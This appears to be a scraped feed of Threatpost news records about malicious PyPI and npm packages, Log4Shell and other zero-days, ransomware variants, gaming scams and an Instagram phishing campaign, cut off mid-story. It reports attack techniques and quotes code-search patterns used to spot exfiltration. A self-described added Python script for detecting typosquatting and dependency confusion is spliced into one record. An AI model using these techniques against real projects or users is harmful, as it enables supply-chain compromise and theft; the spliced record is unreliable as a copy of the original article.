"threatpost", "title": "LockBit, BlackCat, Swissport, Oh My! Ransomware Activity Stays Strong", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T22:09:27", "id": "THREATPOST:0FD7F2FA7F2D3383F582553124EA843D", "href": "https://threatpost.com/lockbit-blackcat-swissport-ransomware-activity/178261/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:26", "description": "Three malicious packages hosted in the Python Package Index (PyPI) code repository have been uncovered, which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications.\n\nIndependent researcher Andrew Scott found the packages during a nearly sitewide analysis of the code contained in PyPI, which is a repository of software code created in the Python programming language. 
Like GitHub, npm and RubyGems, PyPI allows coders to upload software packages for use by developers in building various applications, services and other projects.\n\nUnfortunately, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.\n\nIn this case, Scott found a malicious package containing a known trojan malware and two info-stealers.\n\nThe trojanized package is called \u201caws-login0tool,\u201d and once the package is installed, it fetches a payload executable that turns out to be a [known trojan](<https://www.virustotal.com/gui/file/79d9ecfcc143ae3216904c882a3984a90901536e6fccd223eb9bf78d943df1cd>), he said.\n\n\u201cI found this package because it was flagged in multiple text searches I did looking at setup.py, since that\u2019s one of the most common locations for malicious code in Python packages since arbitrary code can be executed there at install time,\u201d Scott explained in a [Sunday posting](<https://medium.com/ochrona/3-new-malicious-packages-found-on-pypi-a6bbb14b5e2>). \u201cSpecifically I found this by looking for import urllib.request since this is commonly used to exfiltrate data or download malicious files and it was also triggered by `from subprocess import Popen` which is somewhat suspicious because most packages don\u2019t need to execute arbitrary command line code.\u201d\n\nScott also identified two other malicious packages by looking at the import urllib.request string, both of which are built for data exfiltration.\n\nNamed \u201cdpp-client\u201d and \u201cdpp-client1234I,\u201d the two were uploaded by the same user in February. During installation, they collect details on the environment and file listings, and appear to \u201cbe looking specifically for files related to Apache Mesos,\u201d Scott said, which is an open-source project to manage computer clusters. 
Once the information is gathered, it\u2019s sent off to an unknown web service, according to the researcher.\n\nThe Python security team removed the identified packages once notified on Dec. 10, but all three packages live on thanks to the projects that imported them prior to the removal.\n\nScott said that the trojan package was first added to PyPI on Dec. 1. It was subsequently downloaded nearly 600 times. As for the data stealers, the dpp-client package has been downloaded more than 10,000 times, including 600+ downloads in the last month; dpp-client1234 has been downloaded around 1,500 times. Both packages also mimicked an existing popular library with their source code URL, \u201cso anyone browsing to the package in PyPI or analyzing how popular the library was would see a large number of GitHub stars and forks \u2013 indicating a good reputation.\u201d\n\nThe software supply chain has become an increasingly popular method of distributing malware. Last week, for instance, a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) The packages can be used to take over unsuspecting users\u2019 accounts and servers.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). 
This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:46:34", "type": "threatpost", "title": "Malicious PyPI Code Packages Rack Up Thousands of Downloads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:46:34", "id": "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "href": 
"https://threatpost.com/malicious-pypi-code-packages/176971/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T23:43:39", "description": "As 2021 draws to a close, and the COVID-19 pandemic drags on, it\u2019s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).\n\nWhile 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-repository malware, major zero-day vulnerabilities and fresh ransomware tactics dominated the most-read list \u2013 perhaps indicating that people are keenly focused on cybercrime innovation as the \u201cnew normal\u201d for how we work becomes more settled in.\n\n_**Jump to section:**_\n\n 1. Data Leakapalooza\n 2. Major Zero-Day Vulnerabilities\n 3. Code Repository Malware\n 4. Ransomware Innovations\n 5. Gaming Attacks\n 6. Bonus! Zodiac Killer Cipher Cracked\n\n## **1\\. The Most-Read Story of 2021: Experian Leaks Everyone\u2019s Credit Scores**\n\nThere were obviously some huge news stories that dominated headlines during the year: Log4Shell; Colonial Pipeline; Kaseya; ProxyLogon/ProxyShell; SolarWinds. 
But judging from article traffic, readers were most interested in\u2026the Experian data exposure.\n\nIn April, Bill Demirkapi, a sophomore student at the Rochester Institute of Technology, discovered that the credit scores of almost every American [were exposed](<https://threatpost.com/experian-api-leaks-american-credit-scores/165731/>) through an API tool used by the Experian credit bureau, which he said was left open on a lender site without even basic security protections.\n\nThe tool, called the Experian Connect API, allows lenders to automate FICO-score queries. Demirkapi said he was able to build a command-line tool, which he named \u201cBill\u2019s Cool Credit Score Lookup Utility,\u201d that let him automate lookups of nearly anyone\u2019s credit score, even after entering all zeros in the fields for date of birth.\n\nIn addition to raw credit scores, the college student said that he was able to use the API connection to get \u201crisk factors\u201d from Experian that explained potential flaws in a person\u2019s credit history, such as \u201ctoo many consumer-finance company accounts.\u201d\n\nExperian, for its part, fixed the problem \u2013 and refuted concerns from the security community that the issue could be systemic.\n\nExperian wasn\u2019t the only household name that drew in readers for data insecurity: LinkedIn data going up for sale on the Dark Web was another very hot story this year.\n\n### **LinkedIn Data Scraping**\n\nAfter 500 million LinkedIn members were affected in a data-scraping incident in April, [it happened again](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>) in June. 
A posting with 700 million LinkedIn records for sale appeared on popular cyberattacker destination RaidForums, by a hacker calling himself \u201cGOD User TomLiner.\u201d The advertisement included a sample of 1 million records as \u201cproof.\u201d\n\nPrivacy Sharks examined the free sample and saw that the records include full names, gender, email addresses, phone numbers and industry information. It\u2019s unclear what the origin of the data is \u2013 but the scraping of public profiles is a likely source. According to LinkedIn, no breach of its networks occurred.\n\nEven so, the security ramifications were significant, researchers said, in terms of the cache enabling brute-force cracking of account passwords, email and telephone scams, phishing attempts, identity theft and finally, the data could be a social-engineering goldmine. Sure, attackers could simply visit public profiles to target someone, but having so many records in one place could make it possible to automate targeted attacks using information about users\u2019 jobs and gender, among other details.\n\n## **2\\. Major Zero-Day Bugs**\n\nOK, this one\u2019s a perennial topic of fascination, but 2021 had some doozies, starting with Log4Shell.\n\n### **Log4Shell Threatens Basically All Web Servers in Existence**\n\nThe Log4Shell vulnerability is [an easily exploited flaw](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) in the ubiquitous Java logging library Apache Log4j that could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s still being actively exploited in the wild.\n\nThe flaw (CVE-2021-44228) first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft. Apache rushed a patch but within a day or two, attacks became rampant as threat actors tried to exploit the new bug. 
From there, news of additional exploitation vectors, a second bug, various kinds of real-world attacks and the sheer enormity of the threat surface (the logging library is basically everywhere) dominated reader interest in December.\n\n### **NSO Group\u2019s Zero-Click Zero Day for Apple**\n\nIn September, a [zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) dubbed ForcedEntry by researchers was found, affecting all things Apple: iPhones, iPads, Macs and Watches. It turns out that it was being exploited by NSO Group to install the infamous Pegasus spyware.\n\nApple pushed out an emergency fix, but Citizen Lab had already observed NSO Group using a never-before-seen zero-click exploit targeting iMessage to illegally spy on Bahraini activists.\n\nThe ForcedEntry exploit was particularly notable in that it was successfully deployed against the latest iOS versions \u2013 14.4 & 14.6 \u2013 blowing past Apple\u2019s new BlastDoor sandboxing feature to install spyware on the iPhones of the Bahraini activists.\n\n### **Giant Zero-Day Hole in Palo Alto Security Appliances**\n\nAnother zero-day item that garnered big reader interest was [the news](<https://threatpost.com/massive-zero-day-hole-found-in-palo-alto-security-appliances/176170/>) that researchers from Randori developed a working exploit to gain remote code execution (RCE) on Palo Alto Networks\u2019 GlobalProtect firewall, via the critical bug CVE-2021-3064.\n\nRandori researchers said that if an attacker successfully exploits the weakness, they can gain a shell on the targeted system, access sensitive configuration data, extract credentials and more. 
And after that, attackers can dance across a targeted organization, they said: \u201cOnce an attacker has control over the firewall, they will have visibility into the internal network and can proceed to move laterally.\u201d\n\nPalo Alto Networks patched the bug on the day of disclosure.\n\n### **The Great Google Memory Bug Zero-Day**\n\nIn March, Google [hurried out a fix](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) for a vulnerability in its Chrome browser that was under active attack. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems. Readers flocked to the coverage of the issue.\n\nThe flaw is a use-after-free vulnerability, and specifically exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.\n\n\u201cBy persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,\u201d according to IBM X-Force\u2019s report on the bug.\n\n### **Dell Kernel-Privilege Bugs**\n\nEarlier this year, five high-severity security bugs that remained hidden for 12 years [were found](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) to exist in all Dell PCs, tablets and notebooks shipped since 2009. 
They allow attackers to bypass security products, execute code and pivot to other parts of the network for lateral movement, according to SentinelLabs.\n\nThe flaws lurked in Dell\u2019s firmware update driver, impacting potentially hundreds of millions of Dell desktops, laptops, notebooks and tablets, researchers said.\n\nThe local privilege-escalation (LPE) bugs exist in version 2.3 of the firmware update driver (dbutil_2_3.sys), which has been in use since 2009. The driver handles Dell firmware updates via the Dell BIOS Utility, and it comes pre-installed on most Dell machines running Windows.\n\n## 3\\. Code Repositories and the Software Supply Chain\n\nThe software supply chain is anchored by open-source code repositories \u2013 centralized locations where developers can upload software packages for other developers to use in building applications, services and other projects. They include GitHub, as well as more specialized repositories like the Node.js package manager (npm) registry for JavaScript; RubyGems for the Ruby programming language; the Python Package Index (PyPI) for Python; and others.\n\nThese package managers represent a supply-chain threat given that anyone can upload code to them, which can in turn be unwittingly used as building blocks in various applications. 
Any application that pulls in malicious code can in turn attack that application\u2019s users.\n\nTo boot, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.\n\nCybercriminals have swarmed to this attack surface, and readers in 2021 loved to hear about their exploits.\n\nFor instance, in December, a [series of 17 malicious packages](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) in npm were found; they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files. The goal was to steal Discord tokens, which can be used to take over accounts.\n\nAlso this month, three malicious packages hosted in the PyPI code repository [were uncovered](<https://threatpost.com/malicious-pypi-code-packages/176971/>), which collectively had more than 12,000 downloads \u2013 and presumably slithered into installations in various applications. The packages included one trojan for establishing a backdoor on victims\u2019 machines, and two info-stealers.\n\nResearchers also discovered last week that there were 17,000 Java packages in the Maven Central ecosystem still carrying unpatched Log4j, leaving massive supply-chain risk on the table from [Log4Shell exploits](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>). It will likely take \u201cyears\u201d for it to be fixed across the ecosystem, [according](<https://threatpost.com/java-supply-chain-log4j-bug/177211/>) to Google\u2019s security team.\n\nUsing malicious packages as a cyberattack vector was a common theme earlier in the year too. 
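Before that rundown, here is what these name-based tricks look like when turned into a check a build pipeline could run against a project's manifest. This is an added example, not code from the article or from any of the vendors it cites: the manifest, the private-package list, the public-registry snapshot, the allowlist and the brand list are all constructed, and the `acme-*` names are hypothetical. It flags packages within one or two edits of a well-known name (typosquatting), bare or brand-prefixed vendor names that nobody vetted (brandjacking), and private package names that also exist on the public registry with a higher version, which is the copy a default resolver would pick (dependency confusion).

```python
"""Audit a dependency manifest for the name-confusion tricks this section describes.

Added example, not code from the article or from any vendor it cites. Every input
below is constructed so the script runs offline; in practice the public-registry
snapshot would be built from npm or PyPI metadata and the known-good list from the
organisation's own allowlist.
"""
from typing import Dict, List, Set, Tuple

# What the project declares: package name -> pinned version (constructed).
PROJECT_DEPENDENCIES: Dict[str, str] = {
    "discord-xp": "1.0.4",          # legitimate Discord bot framework
    "discord-fix": "1.0.0",         # trades on the Discord name, not on any allowlist
    "sonatype": "2.1.0",            # bare vendor name: brandjacking
    "lodahs": "4.17.21",            # two edits away from lodash: typosquatting
    "lodash": "4.17.21",
    "acme-internal-auth": "1.2.0",  # hypothetical private package
}
# Packages the organisation publishes only to its private registry (hypothetical).
INTERNAL_PACKAGES: Dict[str, str] = {"acme-internal-auth": "1.2.0", "acme-billing": "0.9.1"}
# Snapshot of the public registry: name -> latest published version (constructed).
PUBLIC_REGISTRY: Dict[str, str] = {
    "discord-xp": "1.0.4", "discord-fix": "1.0.0", "sonatype": "2.1.0",
    "lodahs": "4.17.21", "lodash": "4.17.21",
    "acme-internal-auth": "99.0.0",  # attacker-published copy of the private name
}
KNOWN_GOOD: Set[str] = {"discord-xp", "lodash", "express", "react"}
BRANDS: Set[str] = {"discord", "sonatype", "amazon", "lyft", "slack", "zillow"}

Finding = Tuple[str, str, str]  # (package, category, detail)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert, delete, substitute) by the classic DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def parse_version(v: str) -> Tuple[int, ...]:
    """Numeric dotted versions only; enough for the sample data."""
    return tuple(int(p) for p in v.split("."))


def audit(deps: Dict[str, str], known_good: Set[str], brands: Set[str],
          internal: Dict[str, str], public: Dict[str, str]) -> List[Finding]:
    findings: List[Finding] = []
    for name in deps:
        if name in known_good and name not in internal:
            continue  # vetted public package, nothing to check
        # 1. Typosquatting: one or two edits from a well-known name, but not that name.
        for good in known_good:
            d = edit_distance(name, good)
            if 0 < d <= 2:
                findings.append((name, "typosquat", f"{d} edit(s) from {good}"))
        # 2. Brandjacking: a bare brand, or a brand-prefixed name, that nobody vetted.
        prefix = name.split("-")[0]
        if name in brands or prefix in brands:
            brand = name if name in brands else prefix
            findings.append((name, "brandjack", f"uses brand name {brand}"))
        # 3. Dependency confusion: the private name also exists publicly with a
        #    higher version, which is what a default resolver would prefer.
        if name in internal and name in public and \
                parse_version(public[name]) > parse_version(internal[name]):
            findings.append((name, "dependency-confusion",
                             f"public {public[name]} beats internal {internal[name]}"))
    return findings


if __name__ == "__main__":
    for pkg, kind, detail in audit(PROJECT_DEPENDENCIES, KNOWN_GOOD, BRANDS,
                                   INTERNAL_PACKAGES, PUBLIC_REGISTRY):
        print(f"{pkg:20} {kind:22} {detail}")
```

The edit-distance threshold is deliberately tight: `discord-fix` sits three edits from `discord-xp`, so it is the brand check, not the typosquat check, that catches it, which is why both are needed. The dependency-confusion fix in practice is not a scanner but resolver configuration: scope private names and pin the registry they may come from, so a public package of the same name is never a candidate.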
Here\u2019s a rundown of other recent discoveries:\n\n * In January, other Discord-stealing malware [was discovered](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>) in three npm packages. One, \u201can0n-chat-lib,\u201d had no legitimate \u201ctwin\u201d package, but the other two made use of brandjacking and typosquatting to lure developers into thinking they\u2019re legitimate. The malicious \u201cdiscord-fix\u201d package is named to resemble the legitimate \u201cdiscord-XP,\u201d an XP framework for Discord bots. The \u201csonatype\u201d package meanwhile made use of pure brandjacking.\n * In March, researchers [spotted](<https://threatpost.com/malicious-code-bombs-amazon-lyft-slack-zillow/164455/>) malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository \u2013 all of which exfiltrated sensitive information.\n * That March attack was based on research from security researcher Alex Birsan, who found that it\u2019s possible to [inject malicious code](<https://threatpost.com/supply-chain-hack-paypal-microsoft-apple/163814/>) into common tools for installing dependencies in developer projects: if an attacker publishes a public package under the same name as a company\u2019s private, internal package, with a higher version number, the installer will happily fetch the attacker\u2019s copy (a technique now known as dependency confusion). Such projects typically use public repositories from sites like GitHub. The malicious code then can use these dependencies to propagate malware through a targeted company\u2019s internal applications and systems. The novel supply-chain attack was (ethically) used to breach the systems of more than 35 technology players, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla and Uber, by exploiting public, open-source developer tools.\n * In June, a set of cryptomining packages was found [to have infiltrated](<https://threatpost.com/cryptominers-python-supply-chain/167135/>) PyPI. 
Researchers found six different malicious packages hiding there, which had a collective 5,000 downloads.\n * In July, a credentials-stealing package that uses a legitimate password-recovery tool for Google\u2019s Chrome web browser [was found lurking in](<https://threatpost.com/npm-package-steals-chrome-passwords/168004/>) npm. Researchers caught the malware filching credentials from Chrome on Windows systems. The password-stealer is multifunctional: It also listens for incoming commands from the attacker\u2019s command-and-control (C2) server and can upload files, record from a victim\u2019s screen and camera, and execute shell commands.\n\n## **4\\. Interesting Ransomware Variants**\n\nThe ransomware epidemic matured in 2021, with the actual malware used to lock up files progressing beyond simply slapping an extension on targeted folders. Readers flocked to malware-analysis stories covering advancements in ransomware strains, including the following Top 3 discoveries.\n\n### **HelloKitty\u2019s Linux Variant Targets VMs**\n\nIn June, researchers [publicly spotted](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>), for the first time, a Linux encryptor being used by the HelloKitty ransomware gang.\n\nHelloKitty, the same group behind the [February attack](<https://threatpost.com/cyberpunk-2077-publisher-hack-ransomware/163775/>) on videogame developer CD Projekt Red, has developed numerous Linux ELF-64 versions of its ransomware, which it used to target VMware ESXi servers and the virtual machines (VMs) running on them.\n\nVMware ESXi, formerly known as ESX, is a bare-metal hypervisor that installs easily onto servers and partitions them into multiple VMs. 
While that makes it easy for multiple VMs to share the same hard-drive storage, it sets systems up to be one-stop shopping spots for attacks, since attackers can encrypt the centralized virtual hard drives used to store data from across VMs.\n\nDirk Schrader of New Net Technologies (NNT) told Threatpost that on top of the attraction of ESXi servers as a target, \u201cgoing that extra mile to add Linux as the origin of many virtualization platforms to [malware\u2019s] functionality\u201d has the welcome side effect of enabling attacks on any Linux machine.\n\n### **MosesStaff: No Decryption Available**\n\nA politically motivated group known as MosesStaff [was seen in November](<https://threatpost.com/mosesstaff-locks-targets-ransom-decryption/176366/>) paralyzing Israeli entities with no financial goal \u2013 and no intention of handing over decryption keys. Instead, it was using ransomware in politically motivated, destructive attacks at Israeli targets, looking to inflict the most damage possible.\n\nMosesStaff encrypts networks and steals information, with no intention of demanding a ransom or rectifying the damage. The group also maintains an active social-media presence, pushing provocative messages and videos across its channels, and making its intentions known.\n\n### **Epsilon Red Targets Exchange Servers**\n\nThreat actors in June [were seen deploying](<https://threatpost.com/exchange-servers-epsilon-red-ransomware/166640/>) new ransomware on the back of a set of PowerShell scripts developed for exploiting flaws in unpatched Exchange Servers.\n\nThe Epsilon Red ransomware \u2013 a reference to an obscure enemy character in the X-Men Marvel comics, a super soldier of Russian origin armed with four mechanical tentacles \u2013 was discovered after an attack on a U.S.-based company in the hospitality sector.\n\nResearchers said the ransomware was different in the way it spreads its hooks into a corporate network. 
While the malware itself is a \u201cbare-bones\u201d 64-bit Windows executable programmed in the Go programming language, its delivery system relies on a series of PowerShell scripts that \u201cprepared the attacked machines for the final ransomware payload and ultimately delivered and initiated it,\u201d they wrote.\n\n## **5\\. Gaming Security**\n\nFor the second year in a row, gaming security was on the radar for readers in 2021, possibly because cybercriminals continue to target this area as a result of the global COVID-19 pandemic driving higher volumes of play. In a recent survey by Kaspersky, nearly 61 percent of respondents reported suffering foul play such as ID theft, scams or the hack of in-game valuables. Some of the most popular articles are recapped below.\n\n### **Steam Used to Host Malware**\n\nIn June, the appropriately named SteamHide malware [emerged](<https://threatpost.com/steam-gaming-delivering-malware/166784/>), which disguises itself inside profile images on the gaming platform Steam.\n\nThe Steam platform merely serves as a vehicle that hosts the malicious file, according to research from G Data: \u201cThe heavy lifting in the shape of downloading, unpacking and executing a malicious payload fetched by the loader is handled by an external component, which accesses the malicious profile image on one Steam profile. 
This external payload can be distributed via crafted emails to compromised websites.\u201d\n\nThe steganography technique itself is not new, but using Steam profiles as attacker-controlled hosting is \u2013 and readers\u2019 ears perked up in a big way when we posted the story.\n\n### **Twitch Source-Code Leak**\n\nIn October, an anonymous user posted a link to a 125GB torrent on 4chan, containing all of Twitch\u2019s source code, commit history going back to its inception, user-payout information and more.\n\nThe attacker [claimed to have ransacked](<https://threatpost.com/twitch-source-code-leaked/175359/>) the live gameplay-streaming platform for everything it\u2019s got; Twitch confirmed the breach not long after.\n\nThe threat actor rationalized gutting the service by saying that the Twitch community needs to have the wind knocked out of its lungs. They called the leak a means to \u201cfoster more disruption and competition in the online-video streaming space,\u201d because \u201ctheir community is a disgusting toxic cesspool.\u201d\n\n### **Steam-Stealing Discord Scams**\n\nIn November, a scam started making the rounds on Discord, through which cybercriminals could harvest Steam account information and make off with any value the account contained.\n\nGamer-aimed Discord scams are just about everywhere. But researchers [flagged a new approach](<https://threatpost.com/free-discord-nitro-offer-steam-credentials/176011/>) as noteworthy because it crossed over between Discord and the Steam gaming platform, with crooks offering a purported free subscription to Nitro (a Discord add-on that enables avatars, custom emoji, profile badges, bigger uploads, server boosts and so on), in exchange for \u201clinking\u201d the two accounts.\n\nThe target is first served a malicious direct message on Discord with the fake offer. 
\u201cJust link your Steam account and enjoy,\u201d the message said, and it included a link to purportedly do just that. The malicious link takes users to a spoofed Discord page with a button that reads, \u201cGet Nitro.\u201d Once a victim clicks on the button, the site appears to serve a Steam login pop-up, but researchers explained the pop-up is still part of the same malicious site.\n\nThe gambit is intended to fool users into thinking they\u2019re being taken to the Steam platform to enter their login information \u2014 in reality, the crooks are poised to harvest the credentials.\n\n### **Sony PlayStation3 Bans**\n\nIn June, a reported breach of a Sony folder containing the serial ID numbers for every PlayStation3 console out there [appeared to](<https://threatpost.com/ps3-players-ban-attacks-gaming/167303/>) have led to users being inexplicably banned from the platform.\n\nSony reportedly left a folder with every PS3 console ID online unsecured, and it was discovered and reported by a Spanish YouTuber with the handle \u201cThe WizWiki\u201d in mid-April. In June, players on PlayStation Network message boards began complaining that they couldn\u2019t sign on.\n\nUsers mused that threat actors had started using the stolen PS3 console IDs for malicious purposes, causing the legitimate players to get banned. But Sony didn\u2019t confirm a connection between the PS3 ID breach and player reports of being locked out of the platform.\n\n## **Bonus Item: Zodiac Killer Cipher \u2013 Revealed!!**\n\nOne of the quirky stories that made it into the Top 10 most-read Threatpost stories for 2021 concerned the cracking of the Zodiac serial killer\u2019s 340 cipher, which couldn\u2019t be solved for 50 years. 
\n\nIn December 2020, the code [was cracked](<https://threatpost.com/cryptologists-zodiac-killer-340-cipher/162353/>) by a small team of codebreakers.\n\nThe Zodiac serial killer is believed to have murdered at least five people \u2014 and likely more \u2014 in and around Northern California in the late 1960s and early 1970s. The still-unnamed murderer sent a series of four coded messages to local newspaper outlets, bragging about his crimes and containing cryptic icons, which earned him the moniker \u201cZodiac.\u201d\n\nThe first cipher was quickly decoded. But the second, the 340 Cipher, named after its 340 characters, was trickier to figure out. Australia-based mathematician Sam Blake calculated that there were 650,000 possible ways to read the code, and Jarl Van Eycke, whose day job is as a warehouse operator in Belgium, wrote code-breaking software to tackle decryption. Soon, their unique algorithmic approach paid off. 
The message, officially recognized by the FBI as correct, reads:\n\n\u201cI HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH.\u201d\n\nWhile the name of the elusive serial killer remains hidden, the breakthrough represents a triumph for cryptology, one of the basic building blocks of cybersecurity.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T18:57:24", "type": "threatpost", "title": "The 5 Most-Wanted Threatpost Stories of 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T18:57:24", "id": "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "href": "https://threatpost.com/5-top-threatpost-stories-2021/177278/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T14:21:33", "description": "A phishing campaign used the guise of Instagram technical support to steal login credentials from employees of a prominent U.S. life insurance company headquartered in New York, researchers have revealed.\n\nAccording to a [report](<https://www.armorblox.com/blog/the-email-bait-and-phish-instagram-phishing-attack>) published by Armorblox on Wednesday, the attack combined brand impersonation with social engineering and managed to bypass Google\u2019s email security by using a valid domain name, eventually reaching the mailboxes of hundreds of employees.\n\n## Scam Looked Identical to Instagram\n\nThe attack began with a simple email. Disguised as an alert from Instagram\u2019s technical support team, it indicated that the recipient\u2019s account was under threat of deactivation. The intention, according to the report, was \u201cto create a sense of urgency while instilling trust in the sender.\u201d\n\n\u201cYou have been reported for sharing fake content in your membership,\u201d read the body of the email. \u201cYou must verify your membership. If you can\u2019t verify within 24 hours your membership will be permanently deleted from our servers.\u201d This message fostered a sense of urgency, to goad the unsuspecting into clicking on a malicious \u201caccount verify\u201d link. Targets who did so ended up on a landing page, where they were asked to submit their Instagram account login information. 
